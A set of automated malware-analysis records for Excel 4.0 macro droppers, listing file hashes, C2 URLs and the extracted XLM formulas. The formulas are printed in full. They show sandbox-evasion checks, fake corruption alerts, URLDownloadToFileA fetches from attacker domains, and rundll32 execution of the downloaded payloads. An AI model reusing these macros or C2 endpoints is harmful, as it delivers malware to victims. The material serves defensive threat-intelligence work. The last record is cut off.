{"version":"0.2","sample":{"sample":"","kind":"file","target":"4328530b6c1298ba657b0bbd916bccf7e9cb7d05da6933a6e6d989a6182008ce"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"4328530b6c1298ba657b0bbd916bccf7e9cb7d05da6933a6e6d989a6182008ce","filesize":185344,"md5":"2dcf8d64fe5f2d536da39707f8bd84ae","sha1":"116542db9a24f67975e7243ebff0584e11c40beb","sha256":"4328530b6c1298ba657b0bbd916bccf7e9cb7d05da6933a6e6d989a6182008ce","sha512":"3f8c753b481e2807c5affb92895a9a2ffad2d09e792cfb504dac71212bd4d31d9aa3723370311b3a25e95284dbc2459d8812cc6c0442ed04dc54047eaffafc46","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4328530b6c1298ba657b0bbd916bccf7e9cb7d05da6933a6e6d989a6182008ce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"432d95a2c8a2045b9440351c8dfd24b84f5aed10ec87a59e8d9855926f4e764b"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"432d95a2c8a2045b9440351c8dfd24b84f5aed10ec87a59e8d9855926f4e764b","filesize":167936,"md5":"2706ee8f32d38f8016a3c97ad96cc136","sha1":"09e9266510d74e5183ba1128d6f4adb8f1c86d5e","sha256":"432d95a2c8a2045b9440351c8dfd24b84f5aed10ec87a59e8d9855926f4e764b","sha512":"3e499cbfcf77ba84059d5dd3414f6cadd356fbed16d908d6f55f887358a24cf62b5799e8e64518bff4165b9f02603da99916e2f1bdee0139c1424c5bdb609231","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"432d95a2c8a2045b9440351c8dfd24b84f5aed10ec87a59e8d9855926f4e764b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hT5EqQ7Aa4\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4334f6ee2c8f5aa7e8eb58f992c8e4246f80abd356f6ac617d667e98786fb376"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"4334f6ee2c8f5aa7e8eb58f992c8e4246f80abd356f6ac617d667e98786fb376","filesize":144384,"md5":"c91608c2d185d8a12f45afb440f59262","sha1":"113f12bee715b73b21048c878637afda4e9d5ea8","sha256":"4334f6ee2c8f5aa7e8eb58f992c8e4246f80abd356f6ac617d667e98786fb376","sha512":"e9a2e444a6f59d7cf62571baecbe179f32cb41d86713c2a87e3fde9db5093f2bc352463945a9867087ee751b8a8b30b21b546a7c8d3f865ab4d2571ba7399988","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4334f6ee2c8f5aa7e8eb58f992c8e4246f80abd356f6ac617d667e98786fb376.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"K3MnNxm8ym\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"434831048a6da60b361d4d442d42fa220a2aab9d9a7d846515ae48d7ca7cd695"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"434831048a6da60b361d4d442d42fa220a2aab9d9a7d846515ae48d7ca7cd695","filesize":113664,"md5":"f7c97fbe7f2c05ced7d30290626a42d9","sha1":"ce20346a3245fd0454eea573931439be29287141","sha256":"434831048a6da60b361d4d442d42fa220a2aab9d9a7d846515ae48d7ca7cd695","sha512":"a58b59de221a0e828801ebef2a93e8884ebcf4b58dc97e5ab3a6522122689fda0d6f1aea53c983e671651f998cc26d3613a8e5d7dd8d0396783127059d6d4dd5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"434831048a6da60b361d4d442d42fa220a2aab9d9a7d846515ae48d7ca7cd695.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Nq8pQB7XwJ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"43487529fdab6c267ce9d9b3633951f92a8c750038d098cb49fd56c1cb9957a6"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"43487529fdab6c267ce9d9b3633951f92a8c750038d098cb49fd56c1cb9957a6","filesize":209920,"md5":"c538238c31a4b5ddb9815fd7d21ca53a","sha1":"d6a45a80e113af13e49cbaf31db03f986f811c42","sha256":"43487529fdab6c267ce9d9b3633951f92a8c750038d098cb49fd56c1cb9957a6","sha512":"921997055de45a69f0612724315fd56d774761aa8873b203c137814ec2d99308ce31a2971e98eec32b38b76de06ff69649cedff98b839a0c98c02a6d06959618","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"43487529fdab6c267ce9d9b3633951f92a8c750038d098cb49fd56c1cb9957a6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"rdXnoHzLDM\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"43506f6a0a86213e34f405820166f6f6cfef7ab29f3fc7ecbd4fcf2f5dfd63bc"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"43506f6a0a86213e34f405820166f6f6cfef7ab29f3fc7ecbd4fcf2f5dfd63bc","filesize":160768,"md5":"5dd818b801ad1a593f3339796358bbde","sha1":"35ec50c085189b6fe0b66211d896801460ffc005","sha256":"43506f6a0a86213e34f405820166f6f6cfef7ab29f3fc7ecbd4fcf2f5dfd63bc","sha512":"3d38ef8fa614fe207343b1f168e408c3be6c8271209ba5056fbb3542a2cbac2a2ce4fbb776c60579cd8fbd2a151c62582c2ab9348125f5e7ce83583b155a5873","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"43506f6a0a86213e34f405820166f6f6cfef7ab29f3fc7ecbd4fcf2f5dfd63bc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RcbvsLUcp0\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"43571c9e7008cc2e5e6759ac33b99c9d0e49dbad30aebbdf553fef01f30b06df"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"43571c9e7008cc2e5e6759ac33b99c9d0e49dbad30aebbdf553fef01f30b06df","filesize":168448,"md5":"f38211fe0d3daa53036e073f9a9b1c52","sha1":"4f7d38ccf3410b2357120c9099bd8d5d1ccfc17d","sha256":"43571c9e7008cc2e5e6759ac33b99c9d0e49dbad30aebbdf553fef01f30b06df","sha512":"39df35aabd663fbee0a101cea235515ee344a372d1aa4ece35db05c764da931b03c6f6c92fc8bae43f10dccedf7b690657da3300bd13deae6f90a03f619fa937","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"43571c9e7008cc2e5e6759ac33b99c9d0e49dbad30aebbdf553fef01f30b06df.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2MrEQwSN1P\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"436b844e30d085873fc249d90f19d57cab930610e3a53d5ef888d0f9f530e0a3"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"436b844e30d085873fc249d90f19d57cab930610e3a53d5ef888d0f9f530e0a3","filesize":116224,"md5":"5f2c6ee0f48ee4c7675ef6f5161c6b18","sha1":"da069f0c281a7830125cd966f31829d067482e1a","sha256":"436b844e30d085873fc249d90f19d57cab930610e3a53d5ef888d0f9f530e0a3","sha512":"fe0fae7f1828092f1a4a31db587500031e767963107e8f2a8f3a23810d8203565d5fdb226b162f5c8f865ba9de8638f082ab7b28fabf11f4f390c44c0ed853fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"436b844e30d085873fc249d90f19d57cab930610e3a53d5ef888d0f9f530e0a3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CgzEb04OMx\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"43700da6258a753567c4c91f18d99e6514f955b3a03c715c4e899dfb14cc5002"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"43700da6258a753567c4c91f18d99e6514f955b3a03c715c4e899dfb14cc5002","filesize":112128,"md5":"a9ce89b40a4901a81ecbcef267c81a57","sha1":"787032184f839b0b2edf85472fa8ced62d0e0937","sha256":"43700da6258a753567c4c91f18d99e6514f955b3a03c715c4e899dfb14cc5002","sha512":"0ea84e6f627ee6f0d3800bf782f49e192e526bf0bd77be511e81ee47e00649063cd54dbaa1e2a32abe2c1dfb74e2889aa5074316cd2ba611e91b726f4e56c46c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"43700da6258a753567c4c91f18d99e6514f955b3a03c715c4e899dfb14cc5002.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"437277c5706cb338952ce86140a0cad4368de36020cc79783b50c3b992cd04d2"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"437277c5706cb338952ce86140a0cad4368de36020cc79783b50c3b992cd04d2","filesize":145920,"md5":"dcd140088063109b67dd06794f14efa1","sha1":"7371840f164d9d470c4694abd2055628d66285eb","sha256":"437277c5706cb338952ce86140a0cad4368de36020cc79783b50c3b992cd04d2","sha512":"6f3a7ee2ec1bb28b64a5f5dedd1e0c8ce4754b2875100ea368bcf630c425e8697a3d81469e7e9b06f8c72cc0bc10b933fb9a2820a3ccc8969ee6cabd6b4e7880","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"437277c5706cb338952ce86140a0cad4368de36020cc79783b50c3b992cd04d2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"BadcwKe1gI\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4374ac68c29270142690473a5511623f70656cf7d933dfcf9d4f9793f6f4ea0c"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"4374ac68c29270142690473a5511623f70656cf7d933dfcf9d4f9793f6f4ea0c","filesize":185344,"md5":"c5427594d20b2904729281bd662a0b7e","sha1":"daf5f02c5b05bec39a8142aa493cd9da8b6e0e15","sha256":"4374ac68c29270142690473a5511623f70656cf7d933dfcf9d4f9793f6f4ea0c","sha512":"e4779a1ef45e2fdd45a3bde212474d2f862b85ea6f248498fbebe1776243dcee2b1fd46a58b7cd2527f92f4acd03137847e77b6e021e5e622979b2ffcc43c005","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4374ac68c29270142690473a5511623f70656cf7d933dfcf9d4f9793f6f4ea0c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"437d90d179fab0701b6322e708b4a9dbaa0c7d741de2364ea409fa3a5c8240c9"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"437d90d179fab0701b6322e708b4a9dbaa0c7d741de2364ea409fa3a5c8240c9","filesize":185344,"md5":"a03c1b8be9127f1ae77cb60de0b0fb35","sha1":"5c5466ee38ef8b247930d9d889827f96a437f5d8","sha256":"437d90d179fab0701b6322e708b4a9dbaa0c7d741de2364ea409fa3a5c8240c9","sha512":"4ccf271f80b07696b38485e82dd4f261039339cc592576b5207525ab606b8307ad59fbe55e4c6ace51fa6cc5d18064b3fcc4d2cd50632df63d96e84d764278cc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"437d90d179fab0701b6322e708b4a9dbaa0c7d741de2364ea409fa3a5c8240c9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4380a7c59c0f50dc17031cdbfd1cd100a9d4475f8fd98c9acd16b9b958c5aa33"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"4380a7c59c0f50dc17031cdbfd1cd100a9d4475f8fd98c9acd16b9b958c5aa33","filesize":112128,"md5":"5f88009378a8af8484da47f944f81569","sha1":"0071be35d0d84a38a6991f299ed985dbbdd3cc6a","sha256":"4380a7c59c0f50dc17031cdbfd1cd100a9d4475f8fd98c9acd16b9b958c5aa33","sha512":"b9af36e21f3a9b9afe48331f424adbe82fd50ddc2b4a2b9868cdddbcec92b64ca1defe5f56f5d8586d10dfeec7d7151ffa6b9dd420b8ae726047ca3b6b75496c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4380a7c59c0f50dc17031cdbfd1cd100a9d4475f8fd98c9acd16b9b958c5aa33.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"438525b67e72c2aec110741ae8c2aef3593194807389fd18abde2b7af0e8fb60"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"438525b67e72c2aec110741ae8c2aef3593194807389fd18abde2b7af0e8fb60","filesize":185344,"md5":"fe65e315c58a8a4d95fdf90b841d7e28","sha1":"7198745c613fe50c78208db9214e02e21da2eca2","sha256":"438525b67e72c2aec110741ae8c2aef3593194807389fd18abde2b7af0e8fb60","sha512":"cc0ebddec8ec1df7030c09ae4e4622e69fcb4afe3affc70115f469115b30c9ec8e17b7faa76832bfc542f050c5763bac517cafb3cdf8f092f754412ca6e11f12","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"438525b67e72c2aec110741ae8c2aef3593194807389fd18abde2b7af0e8fb60.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4387100b580b2b2a51fd78201e49fb3638a52b2a0ff6a38e4a809ae475b99afa"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"4387100b580b2b2a51fd78201e49fb3638a52b2a0ff6a38e4a809ae475b99afa","filesize":112640,"md5":"7231980f6568ee7d6fc1c316ead54e6c","sha1":"ef35c5457d3956b69d69ad59912a4242b4daa905","sha256":"4387100b580b2b2a51fd78201e49fb3638a52b2a0ff6a38e4a809ae475b99afa","sha512":"705f91ba669da3ef348ae4d8d3f191e71a04ed70f229c4b3bf103e586ad12ed8398d07e093ae3876b51c3f2efafe977dddd4b2ef8206950324779728f1ba182a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4387100b580b2b2a51fd78201e49fb3638a52b2a0ff6a38e4a809ae475b99afa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"43a9e6fe90a70fb0f337cb922f4716f901459bf761f02822bd3f36f535802e2b"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10,"tags":["macro"]},"signatures":[{"name":"Suspicious Office macro","score":8,"tags":["macro"],"yara_rule":"office_macro_on_action","desc":"Office document macro which triggers in special circumstances - often malicious."}],"files":[{"filename":"43a9e6fe90a70fb0f337cb922f4716f901459bf761f02822bd3f36f535802e2b","filesize":243712,"md5":"731e483f800fab79b893a27995382c85","sha1":"2c57463a53d2ed1c9fdcee1fbd6623b5b79c3386","sha256":"43a9e6fe90a70fb0f337cb922f4716f901459bf761f02822bd3f36f535802e2b","sha512":"54197e93996e81a23ac8e5ec46d34a301e0f32854b6451db250179fd550e1389eeae7420e6b804eae539df29f132ce84f86a8f4dc9528bd75f25f6f347c027c4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"43a9e6fe90a70fb0f337cb922f4716f901459bf761f02822bd3f36f535802e2b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"ROMAN(\"zur�ckgelegte Meter\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"43abf89f990c7629b6cdfc31c7fb88dc55acc628ca384fab587711633f57741e"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"43abf89f990c7629b6cdfc31c7fb88dc55acc628ca384fab587711633f57741e","filesize":142848,"md5":"3210ba63269f2197eb6163ea5f26be27","sha1":"77ccf85ae226fd6bf21180ec7619c7605e22c217","sha256":"43abf89f990c7629b6cdfc31c7fb88dc55acc628ca384fab587711633f57741e","sha512":"1180d424168391107a3fa1f26a751d9b653cccee74271a50b355549917034e1a7a61fe24c55fee9ef974e60fbe4b3fd247f0a3233c3d2108e6d2e67ba865b592","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"43abf89f990c7629b6cdfc31c7fb88dc55acc628ca384fab587711633f57741e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"3EWuelYItM\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"43b9aabc7eeb1bcf91613fd0ad714763f5c9c65cd876d1d69293e15af03d8fa6"},"analysis":{"reported":"2020-04-09T16:16:02Z","score":10},"files":[{"filename":"43b9aabc7eeb1bcf91613fd0ad714763f5c9c65cd876d1d69293e15af03d8fa6","filesize":210432,"md5":"d1313aa83cdfedc5da16dc80ed0e88be","sha1":"0435291d1a89764be5efc8ec62417c669e3310d9","sha256":"43b9aabc7eeb1bcf91613fd0ad714763f5c9c65cd876d1d69293e15af03d8fa6","sha512":"61ad80337113a44883a3fc245e263184372a09fc53104d8e5c3c1182fec5bedeb5c0d12a90a7a5cc46d87c1027123911d838ca93eb360d92ecb45495a3e599d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"43b9aabc7eeb1bcf91613fd0ad714763f5c9c65cd876d1d69293e15af03d8fa6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-frunt.php","https://gartnerkvartalet.no/wp-content/themes/calliope/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 